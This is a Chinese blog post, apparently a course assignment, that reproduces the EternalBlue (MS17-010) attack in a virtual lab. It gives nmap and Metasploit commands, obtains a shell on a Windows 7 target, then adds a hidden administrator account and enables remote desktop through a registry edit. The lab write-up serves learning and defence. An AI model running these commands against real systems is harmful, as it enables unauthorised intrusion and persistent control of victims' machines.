<!DOCTYPE html>
<html lang="zh-CN">
  <head>
  <meta charset="UTF-8">
  <meta 
    name="viewport"
    content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
  <meta 
    http-equiv="X-UA-Compatible" 
    content="ie=edge">
  <meta 
    name="theme-color" 
    content="#fff" 
    id="theme-color">
  <meta 
    name="description" 
    content="Hexo">
  <link 
    rel="icon" 
    href="https://s2.loli.net/2022/07/24/wzFMBZjKQu56f9o.png">
  <title>永恒之蓝漏洞复现</title>
  
    
      <meta 
        property="og:title" 
        content="永恒之蓝漏洞复现">
    
    
      <meta 
        property="og:url" 
        content="https://hobbitqia.github.io/p/fdea9fc4.html">
    
    
      <meta 
        property="og:img" 
        content="https://s2.loli.net/2022/07/24/wzFMBZjKQu56f9o.png">
    
    
    
      <meta 
        property="og:type" 
        content="article">
      <meta 
        property="og:article:published_time" 
        content="2022-05-14">
      <meta 
        property="og:article:modified_time" 
        content="2022-07-24">
      <meta 
        property="og:article:author" 
        content="HobbitQia">
      
        
          <meta 
            property="og:article:tag" 
            content="复现">
        
          <meta 
            property="og:article:tag" 
            content="系统安全">
        
      
    
  
  
  <link rel="preload" href="//at.alicdn.com/t/font_1946621_i1kgafibvw.css" as="style" >
  <link rel="preload" href="//at.alicdn.com/t/font_1952792_89b4ac4k4up.css" as="style" >
  <link rel="preload" href="/css/main.css" as="style" >
  
  <link rel="modulepreload" href="//instant.page/5.1.0">
  
  <link rel="stylesheet" href="/css/main.css">
  
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1946621_i1kgafibvw.css">
  
  
<link rel="stylesheet" href="//at.alicdn.com/t/font_1946621_i1kgafibvw.css">

  
<link rel="stylesheet" href="//at.alicdn.com/t/font_1952792_89b4ac4k4up.css">

  
<link rel="stylesheet" href="//at.alicdn.com/t/font_3373189_lmnlsm7mx5s.css">

  <link rel="stylesheet" href="//at.alicdn.com/t/font_1952792_89b4ac4k4up.css">
  
  
  
    <link rel="stylesheet" href="/js/lib/lightbox/baguetteBox.min.css">
  
  <script>
    function loadScript(url, cb) {
      var script = document.createElement('script');
      script.src = url;
      if (cb) script.onload = cb;
      script.async = true;
      document.body.appendChild(script);
    }
    function loadCSS(href, data, attr) {
      var sheet = document.createElement('link');
      sheet.ref = 'stylesheet';
      sheet.href = href;
      sheet.dataset[data] = attr;
      document.head.appendChild(sheet);
    }
    function changeCSS(cssFile, data, attr) {
      var oldlink = document.querySelector(data);
      var newlink = document.createElement("link");
      newlink.setAttribute("rel", "stylesheet");
      newlink.setAttribute("href", cssFile);
      newlink.dataset.prism = attr;
      document.head.replaceChild(newlink, oldlink);
    }
  </script>
  
    
  
  <script>
    // control reverse button
    var reverseDarkList = {
      dark: 'light',
      light: 'dark'
    };
    var themeColor = {
      dark: '#1c1c1e',
      light: '#fff'
    }
    // get the data of css prefers-color-scheme
    var getCssMediaQuery = function() {
      return window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light';
    };
    // reverse current darkmode setting function
    var reverseDarkModeSetting = function() {
      var setting = localStorage.getItem('user-color-scheme');
      if(reverseDarkList[setting]) {
        setting = reverseDarkList[setting];
      } else if(setting === null) {
        setting = reverseDarkList[getCssMediaQuery()];
      } else {
        return;
      }
      localStorage.setItem('user-color-scheme', setting);
      return setting;
    };
    // apply current darkmode setting
  </script>
  
    <script>
      var setDarkmode = function(mode) {
      var setting = mode || localStorage.getItem('user-color-scheme');
      if(setting === getCssMediaQuery()) {
        document.documentElement.removeAttribute('data-user-color-scheme');
        localStorage.removeItem('user-color-scheme');
        document.getElementById('theme-color').content = themeColor[setting];
        document.getElementById('theme-color').dataset.mode = setting;
      } else if(reverseDarkList[setting]) {
        document.documentElement.setAttribute('data-user-color-scheme', setting);
        document.getElementById('theme-color').content = themeColor[setting];
        document.getElementById('theme-color').dataset.mode = setting;
      } else {
        document.documentElement.removeAttribute('data-user-color-scheme');
        localStorage.removeItem('user-color-scheme');
        document.getElementById('theme-color').content = themeColor[getCssMediaQuery()];
        document.getElementById('theme-color').dataset.mode = getCssMediaQuery();
      }
    };
    setDarkmode();
    </script>
  
  
  
    <link rel="preload" href="/js/lib/lightbox/baguetteBox.min.js" as="script">
    <link rel="preload" href="/js/lib/lightbox/baguetteBox.min.css" as="style" >
  
  
    <link rel="preload" href="/js/lib/lozad.min.js" as="script">
  
  
  
  
    
    <link rel="prefetch" href="//cdn.jsdelivr.net/npm/katex@0.11.1/dist/katex.min.css" as="script">
  
  
  
<meta name="generator" content="Hexo 6.2.0"></head>

  <body>
    <div class="wrapper">
       
      <nav class="navbar">
  <div class="navbar-logo">
    <a class="navbar-logo-main" href="/">
      
        <img 
          class="navbar-logo-img"
          width="32"
          height="32"
          src="https://s2.loli.net/2022/07/24/wzFMBZjKQu56f9o.png" 
          alt="blog logo">
      
      <span class="navbar-logo-dsc">HobbitQia's Blog</span>
      </a>
  </div>
  <div class="navbar-menu">
    
      <a 
        href="/" 
        class="navbar-menu-item">
        
          首页
        
      </a>
    
      <a 
        href="/archives" 
        class="navbar-menu-item">
        
          归档
        
      </a>
    
      <a 
        href="/tags" 
        class="navbar-menu-item">
        
          标签
        
      </a>
    
      <a 
        href="/categories" 
        class="navbar-menu-item">
        
          分类
        
      </a>
    
      <a 
        href="/about" 
        class="navbar-menu-item">
        
          关于
        
      </a>
    
      <a 
        href="/links" 
        class="navbar-menu-item">
        
          友链
        
      </a>
    
    <button 
      class="navbar-menu-item darknavbar navbar-menu-btn" 
      aria-label="Toggle dark mode"
      id="dark">
      <i class="iconfont icon-weather"></i>
    </button>
    <button 
      class="navbar-menu-item searchnavbar navbar-menu-btn" 
      aria-label="Toggle search"
      id="search">
      <!-- <i 
        class="iconfont icon-search" 
        style="font-size: 1.2rem; font-weight: 400;">
      </i> -->
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img"
        class="iconify iconify--ion" width="28" height="28" preserveAspectRatio="xMidYMid meet" viewBox="0 0 512 512">
        <path fill="none" stroke="currentColor" stroke-miterlimit="10" stroke-width="28"
          d="M256 80a176 176 0 1 0 176 176A176 176 0 0 0 256 80Z"></path>
        <path fill="none" stroke="currentColor" stroke-miterlimit="10" stroke-width="28"
          d="M232 160a72 72 0 1 0 72 72a72 72 0 0 0-72-72Z"></path>
        <path fill="none" stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="28"
          d="M283.64 283.64L336 336"></path>
      </svg>
    </button>
  </div>
</nav> 
      
      <div 
        id="local-search" 
        style="display: none">
        <input
          class="navbar-menu-item"
          id="search-input"
          placeholder="请输入搜索内容..." />
        <div id="search-content"></div>
      </div>
      
      <div class="section-wrap">
        <div class="container">
          <div class="columns">
            <aside class="left-column">
              
              <div class="card card-author">
                
  <img 
    src="https://s2.loli.net/2022/07/24/wzFMBZjKQu56f9o.png" 
    class="author-img"
    width="88"
    height="88"
    alt="author avatar">

<p class="author-name">HobbitQia</p>
<p class="author-description">Keep your dreams and never give up.</p>
<div class="author-message">
  <a 
    class="author-posts-count" 
    href="/archives">
    <span>4</span>
    <span>文章</span>
  </a>
  <a 
    class="author-categories-count" 
    href="/categories">
    <span>4</span>
    <span>分类</span>
  </a>
  <a 
    class="author-tags-count" 
    href="/tags">
    <span>7</span>
    <span>标签</span>
  </a>
</div>

  <div class="author-card-society">
    
      <div class="author-card-society-icon">
        <a target="_blank" rel="noopener" href="https://github.com/HobbitQia">
          <i class="iconfont icon-github society-icon"></i>
        </a>
      </div>
    
      <div class="author-card-society-icon">
        <a href="mailto:hobbitqia@gmail.com">
          <i class="iconfont icon-mail society-icon"></i>
        </a>
      </div>
    
      <div class="author-card-society-icon">
        <a target="_blank" rel="noopener" href="https://t.me/Hobbit_Qia">
          <i class="iconfont icon-telegram society-icon"></i>
        </a>
      </div>
    
      <div class="author-card-society-icon">
        <a target="_blank" rel="noopener" href="https://t.me/Hobbit_Qia">
          <i class="iconfont icon-QQ society-icon"></i>
        </a>
      </div>
    
      <div class="author-card-society-icon">
        <a target="_blank" rel="noopener" href="https://www.zhihu.com/people/zhui-guang-zhe-45-23">
          <i class="iconfont icon-shejiaotubiao-10 society-icon"></i>
        </a>
      </div>
    
  </div>

              </div>
               <div class="sticky-tablet">
  
  
    <article class="display-when-two-columns spacer">
      <div class="card card-content toc-card">
        <div class="toc-header">
  <i 
    class="iconfont icon-menu" 
    style="padding-right: 2px;">
  </i>目录
</div>
<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text">永恒之蓝漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.2.</span> <span class="toc-text">原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#EternalBlue"><span class="toc-number">1.2.1.</span> <span class="toc-text">EternalBlue</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap"><span class="toc-number">1.2.2.</span> <span class="toc-text">nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#metasploit"><span class="toc-number">1.2.3.</span> <span class="toc-text">metasploit</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.</span> <span class="toc-text">复现过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E5%BB%BA%E7%8E%AF%E5%A2%83"><span class="toc-number">1.3.1.</span> <span class="toc-text">搭建环境</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">配置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">配置过程</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BA"><span class="toc-number">1.3.1.2.1.</span> <span class="toc-text">靶机</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%9C%BA"><span class="toc-number">1.3.1.2.2.</span> <span class="toc-text">攻击机</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.2.</span> <span class="toc-text">攻击过程</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E9%9D%B6%E6%9C%BAIP%E5%9C%B0%E5%9D%80"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">查询靶机IP地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8nmap"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">使用nmap</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8metasploit"><span class="toc-number">1.3.2.3.</span> <span class="toc-text">使用metasploit</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BC%80%E5%90%AF%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2"><span class="toc-number">1.3.2.4.</span> <span class="toc-text">开启远程桌面</span></a></li></ol></li></ol></li></ol></li></ol>
      </div>
    </article>
  
  
  <article class="card card-content categories-widget">
    <div class="categories-card">
  <div class="categories-header">
    <i 
      class="iconfont icon-fenlei" 
      style="padding-right: 2px;">
    </i>分类
  </div>
  <div class="categories-list">
    
      <a href="/categories/%E4%BC%BC%E6%B0%B4%E6%B5%81%E5%B9%B4/">
        <div class="categories-list-item">
          似水流年
          <span class="categories-list-item-badge">1</span>
        </div>
      </a>
    
      <a href="/categories/%E5%85%AC%E5%BC%80%E8%AF%BE/">
        <div class="categories-list-item">
          公开课
          <span class="categories-list-item-badge">1</span>
        </div>
      </a>
    
      <a href="/categories/%E7%BB%8F%E9%AA%8C%E5%88%86%E4%BA%AB/">
        <div class="categories-list-item">
          经验分享
          <span class="categories-list-item-badge">1</span>
        </div>
      </a>
    
      <a href="/categories/%E8%AF%BE%E7%A8%8B%E4%BD%9C%E4%B8%9A/">
        <div class="categories-list-item">
          课程作业
          <span class="categories-list-item-badge">1</span>
        </div>
      </a>
    
  </div>
</div>
  </article>
  
  <article class="card card-content tags-widget">
    <div class="tags-card">
  <div class="tags-header">
    <i 
      class="iconfont icon-biaoqian" 
      style="padding-right: 2px;">
    </i>热门标签
  </div>
  <div class="tags-list">
    
      <a 
        href="/tags/%E6%9D%82%E9%A1%B9/" 
        title="杂项">
        <div class="tags-list-item">杂项</div>
      </a>
    
      <a 
        href="/tags/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/" 
        title="系统安全">
        <div class="tags-list-item">系统安全</div>
      </a>
    
      <a 
        href="/tags/%E5%A4%8D%E7%8E%B0/" 
        title="复现">
        <div class="tags-list-item">复现</div>
      </a>
    
      <a 
        href="/tags/%E5%87%BD%E6%95%B0%E5%BC%8F%E7%BC%96%E7%A8%8B/" 
        title="函数式编程">
        <div class="tags-list-item">函数式编程</div>
      </a>
    
      <a 
        href="/tags/Scheme/" 
        title="Scheme">
        <div class="tags-list-item">Scheme</div>
      </a>
    
      <a 
        href="/tags/OOP/" 
        title="OOP">
        <div class="tags-list-item">OOP</div>
      </a>
    
      <a 
        href="/tags/Python/" 
        title="Python">
        <div class="tags-list-item">Python</div>
      </a>
    
  </div>
</div>
  </article>
  
  
</div>
            </aside>
            <main class="main-column">
              
<article class="card card-content">
  <header>
    <h1 class="post-title">
      永恒之蓝漏洞复现
    </h1>
  </header>
  <div class="post-meta post-show-meta">
    <time datetime="2022-05-14T12:18:53.000Z">
      <i 
        class="iconfont icon-calendar" 
        style="margin-right: 2px;">
      </i>
      <span>2022-05-14</span>
    </time>
    
      <span class="dot"></span>
      
        <a 
          href="/categories/%E8%AF%BE%E7%A8%8B%E4%BD%9C%E4%B8%9A/" 
          class="post-meta-link">
          课程作业
        </a>
      
    
    
      <span class="dot"></span>
      <span>991 字</span>
    
  </div>
  
    <div 
      class="post-meta post-show-meta" 
      style="margin-top: -10px;">
      <div style="display: flex; align-items: center;">
        <i 
          class="iconfont icon-biaoqian" 
          style="margin-right: 2px; font-size: 1.15rem;">
        </i>
        
          
          <a 
            href="/tags/%E5%A4%8D%E7%8E%B0/" 
            class="post-meta-link">
            复现
          </a>
        
          
            <span class="dot"></span>
          
          <a 
            href="/tags/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/" 
            class="post-meta-link">
            系统安全
          </a>
        
      </div>
    </div>
  
  </header>
  <div 
    id="section" 
    class="post-content">
    <h1 id="永恒之蓝漏洞复现"><a href="#永恒之蓝漏洞复现" class="headerlink" title="永恒之蓝漏洞复现"></a>永恒之蓝漏洞复现</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p><strong>永恒之蓝</strong>（英语：EternalBlue)是美国国家安全局开发的漏洞利用程序, 于2017年4月14日被黑客组织影子掮客泄漏. 该工具利用445&#x2F;TCP端口的档案分享协议的漏洞进行散播. (来源: <a target="_blank" rel="noopener" href="https://zh.m.wikipedia.org/zh-hans/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D">维基百科</a>)</p>
<p>本文档旨在依托网上s他人经验, 在虚拟机上实现永恒之蓝的复现工作, 以了解其攻击的原理和过程, 仅作学习和参考.</p>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><h3 id="EternalBlue"><a href="#EternalBlue" class="headerlink" title="EternalBlue"></a>EternalBlue</h3><p>微软SMB协议错误处理远程攻击者的特质数据包, 因而允许远程攻击者在目标主机上远程执行代码, 控制主机. SMB协议通过端口139和445运行, 而445端口是一种TCP端口, 是一个共享的文件夹和打印机的端口，提供局域网中文件或打印机共享服务.</p>
<p>永恒之蓝利用这个漏洞, 可以轻松地获取系统的最高权限, 并利用开放的445端口, 远程将勒索软件植入目标主机, 从而勒索对方.</p>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><p>nmap可以用于寻找活跃主机, 扫描其端口是否开启</p>
<h3 id="metasploit"><a href="#metasploit" class="headerlink" title="metasploit"></a>metasploit</h3><p>metasploit是一个渗透框架, 可以搜索目标模块, 利用模块, 设置参数, 最后进行攻击. 其中也有很多</p>
<p>msfconsole则提供了一个一体化的控制平台, 可以访问metasploit的插件, 我们可以直接利用msfconsole进行以上功能的实现.  </p>
<h2 id="复现过程"><a href="#复现过程" class="headerlink" title="复现过程"></a>复现过程</h2><h3 id="搭建环境"><a href="#搭建环境" class="headerlink" title="搭建环境"></a>搭建环境</h3><h4 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h4><p><strong>虚拟机</strong>: VMware Workstation 16 Pro</p>
<p><strong>靶机</strong>: Windows 7 企业版 x86</p>
<p><strong>攻击机</strong>: Kali Linux 2022</p>
<h4 id="配置过程"><a href="#配置过程" class="headerlink" title="配置过程"></a>配置过程</h4><h5 id="靶机"><a href="#靶机" class="headerlink" title="靶机"></a>靶机</h5><ul>
<li><p>打开VMware Workstation-文件-新建虚拟机-典型-稍后安装操作系统-版本选择Windows 7-选择虚拟机的名称和位置</p>
</li>
<li><p>编辑虚拟机设置-CD&#x2F;DVD(SATA)-使用ISO映像文件-选择镜像安装的地方-确定-开启虚拟机</p>
<p>随后按照步骤安装windows即可</p>
<p><img src="https://s2.loli.net/2022/05/14/LmgzjIkPTdv3t46.png" alt="9W1BF_LX_I_FQF8W36DN_4B.png" srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/LmgzjIkPTdv3t46.png" class="lozad post-image"></p>
</li>
</ul>
<h5 id="攻击机"><a href="#攻击机" class="headerlink" title="攻击机"></a>攻击机</h5><ul>
<li><p>下载kali linux 链接</p>
<img src="https://s2.loli.net/2022/05/14/WPaGl1Sjo3eCiqm.png" alt="O6_G__C___FQHWDL0K6H1XP.png" style="zoom:20%;" / srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/WPaGl1Sjo3eCiqm.png" class="lozad post-image">

<p><a target="_blank" rel="noopener" href="https://www.kali.org/get-kali/#kali-virtual-machines">Get Kali | Kali Linux</a></p>
<p>本次我选择的是kali-linux-2022.1-vmware-amd64.vmx</p>
<p>直接从VMware Workstation 打开即可</p>
</li>
<li><p>第一次打开时需要输入用户名和密码，默认用户名和密码都是kali</p>
<p>安装成功后是如下界面</p>
<p><img src="https://s2.loli.net/2022/05/14/sWpBUohM5e7waHq.png" alt="_N_B1_HQ_FY__~__7RBP20J.png" srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/sWpBUohM5e7waHq.png" class="lozad post-image"></p>
</li>
</ul>
<h3 id="攻击过程"><a href="#攻击过程" class="headerlink" title="攻击过程"></a>攻击过程</h3><h4 id="查询靶机IP地址"><a href="#查询靶机IP地址" class="headerlink" title="查询靶机IP地址"></a>查询靶机IP地址</h4><p>打开windows 7的cmd, 输入<code>ipconfig</code></p>
<p>![Y@ZS&#96;<a href="mailto:&#x5f;&#70;&#x4c;&#66;&#x5f;&#x5f;&#x47;&#x33;&#x40;&#95;&#95;&#x43;&#52;&#88;&#95;&#x35;&#86;&#86;&#x2e;&#112;&#110;&#103;">&#x5f;&#70;&#x4c;&#66;&#x5f;&#x5f;&#x47;&#x33;&#x40;&#95;&#95;&#x43;&#52;&#88;&#95;&#x35;&#86;&#86;&#x2e;&#112;&#110;&#103;</a>](<a target="_blank" rel="noopener" href="https://s2.loli.net/2022/05/14/2KEz6PyYLRiGwBu.png">https://s2.loli.net/2022/05/14/2KEz6PyYLRiGwBu.png</a>)</p>
<p>图中IPv4地址<code>192.168.148.128</code>即为靶机IP地址</p>
<h4 id="使用nmap"><a href="#使用nmap" class="headerlink" title="使用nmap"></a>使用nmap</h4><ul>
<li><p>打开powershell, 输入<code>nmap &lt;靶机ip地址&gt;</code></p>
<p><img src="https://s2.loli.net/2022/05/14/fgiu5cLOvw4se13.png" alt="3__JO_PG_9_~_EYZH0VO_QX.png" srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/fgiu5cLOvw4se13.png" class="lozad post-image"></p>
</li>
<li><p>此时显示Host seems down.于是我们转到windows 7靶机上将其防火墙关闭(便于复现).</p>
<p>![Q_5Y_ZVC&#96;BEB~<a href="mailto:&#72;&#76;&#64;&#x39;&#x46;&#52;&#56;&#81;&#x41;&#80;&#x2e;&#112;&#110;&#x67;">&#72;&#76;&#64;&#x39;&#x46;&#52;&#56;&#81;&#x41;&#80;&#x2e;&#112;&#110;&#x67;</a>](<a target="_blank" rel="noopener" href="https://s2.loli.net/2022/05/14/Rw3hy4G1e7CSLYv.png">https://s2.loli.net/2022/05/14/Rw3hy4G1e7CSLYv.png</a>)</p>
<p>点击左侧’打开或关闭Windows防火墙‘</p>
</li>
<li><p>然后我们重复第一步, 再次在kali中使用nmap</p>
<p><img src="https://s2.loli.net/2022/05/14/f9nR75UedKz4DVo.png" alt="AEA7A21_IUIJNZFP__8U50V.png" srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/f9nR75UedKz4DVo.png" class="lozad post-image"></p>
<p>此时我们观察到其中445端口处于开启状态即可</p>
</li>
</ul>
<h4 id="使用metasploit"><a href="#使用metasploit" class="headerlink" title="使用metasploit"></a>使用metasploit</h4><ul>
<li><p>在kali linux中打开powershell, 输入<code>msfconsole</code></p>
<p>![7EMAV_P&#96;22LX_B_C2_TPDOE.png](<a target="_blank" rel="noopener" href="https://s2.loli.net/2022/05/14/VjCtDTesOFM84ku.png">https://s2.loli.net/2022/05/14/VjCtDTesOFM84ku.png</a>)</p>
</li>
<li><p>远程控制靶机</p>
<p>搜索metasploit中的ms17-010模块    <code>search ms 17_010</code></p>
<p><img src="https://s2.loli.net/2022/05/14/CE4sUVe9mIJA6rB.png" alt="QQ图片20220514162134.png" srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/CE4sUVe9mIJA6rB.png" class="lozad post-image"></p>
<p>随后利用该模块     <code>use exploit/windows/smb/ms17_010_eternalblue</code></p>
<p><code>set rhost &lt;靶机ip地址&gt;</code></p>
<p><code>run</code></p>
<p><img src="https://s2.loli.net/2022/05/14/wZ3shP4p8JVkRoK.png" alt="46BLGZY__PNFY_P67_K__MB.png" srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/wZ3shP4p8JVkRoK.png" class="lozad post-image"></p>
</li>
<li><p>输入<code>shell</code></p>
<p><img src="https://s2.loli.net/2022/05/14/i2fysIoG5t8TA9l.png" alt="6O1L27_M4_L83DNGNT@6@9V.png" srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/i2fysIoG5t8TA9l.png" class="lozad post-image"></p>
<p>可以发现我们已经进入到靶机的shell里了, 那么现在就可以任意控制靶机了</p>
</li>
</ul>
<h4 id="开启远程桌面"><a href="#开启远程桌面" class="headerlink" title="开启远程桌面"></a>开启远程桌面</h4><ul>
<li><p>创建新的用户 <code>net user &lt;username&gt; &lt;password&gt; /add</code></p>
<p>赋予新用户管理员权限    <code>net localgroup administrators &lt;username&gt; /add</code></p>
<p>![_ML_GVPI&#96;P_O7_AFCW__N_A.png](<a target="_blank" rel="noopener" href="https://s2.loli.net/2022/05/14/1aYS4cOB2NjUmek.png">https://s2.loli.net/2022/05/14/1aYS4cOB2NjUmek.png</a>)</p>
</li>
<li><p>打开3389端口    <code>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 0 /f</code></p>
</li>
<li><p>在kali上新打开一个终端, 并远程桌面    <code>rdesktop &lt;靶机ip地址&gt;</code></p>
<p><img src="https://s2.loli.net/2022/05/14/4lBJda5W9wGPzcg.png" alt="X`6_39_7_5__`N@6R_TB_4D.png" srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/4lBJda5W9wGPzcg.png" class="lozad post-image"></p>
<p>选择其他用户-输入刚刚新建的用户及密码</p>
<img src="https://s2.loli.net/2022/05/14/OeSotqBQjZ8VKPG.png" alt="G_`__JZQ_D_`N_S_C`@BNCE.png" style="zoom:67%;" / srcset="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20300'%3E%3C/svg%3E" data-src="https://s2.loli.net/2022/05/14/OeSotqBQjZ8VKPG.png" class="lozad post-image">

<p>这样我们就可以开启远程桌面了, 到此, 漏洞复现工作结束.</p>
</li>
</ul>

  </div>
  <div>
    
      <div 
        class="post-note note-warning copyright" 
        style="margin-top: 42px">
        <p>
          <span style="font-weight: bold;">作者：</span><a 
            target="_blank" 
            rel="nofollow noopener noreferrer" 
            href="/about">
            HobbitQia
          </a>
        </p>
        <p>
          <span style="font-weight: bold;">文章链接：</span><a 
            target="_blank" 
            rel="nofollow noopener noreferrer" 
            href="https://hobbitqia.github.io/p/fdea9fc4.html">
            https://hobbitqia.github.io/p/fdea9fc4.html
          </a>
        </p>
        <p><span style="font-weight: bold;">版权声明：</span>本博客所有文章除特别声明外，均采用<a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0 协议</a>。转载请注明出处！</p>
      </div>
    
  </div>
</article>
<div class="nav">
  
    <div class="nav-item-prev">
      <a 
        href="/p/948c859b.html" 
        class="nav-link">
        <i class="iconfont icon-left nav-prev-icon"></i>
        <div>
          <div class="nav-label">上一篇</div>
          
            <div class="nav-title">大一春夏学期回顾 </div>
          
        </div>
      </a>
    </div>
  
  
    <div class="nav-item-next">
      <a 
        href="/p/76042cd9.html" 
        class="nav-link">
        <div>
          <div class="nav-label">下一篇</div>
          
            <div class="nav-title">CS61A 感想&amp;建议 </div>
          
        </div>
        <i class="iconfont icon-right nav-next-icon"></i>
      </a>
    </div>
  
</div>

<div 
  class="card card-content toc-card" 
  id="mobiletoc">
  <div class="toc-header">
  <i 
    class="iconfont icon-menu" 
    style="padding-right: 2px;">
  </i>目录
</div>
<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text">永恒之蓝漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.2.</span> <span class="toc-text">原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#EternalBlue"><span class="toc-number">1.2.1.</span> <span class="toc-text">EternalBlue</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap"><span class="toc-number">1.2.2.</span> <span class="toc-text">nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#metasploit"><span class="toc-number">1.2.3.</span> <span class="toc-text">metasploit</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.</span> <span class="toc-text">复现过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E5%BB%BA%E7%8E%AF%E5%A2%83"><span class="toc-number">1.3.1.</span> <span class="toc-text">搭建环境</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">配置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">配置过程</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BA"><span class="toc-number">1.3.1.2.1.</span> <span class="toc-text">靶机</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%9C%BA"><span 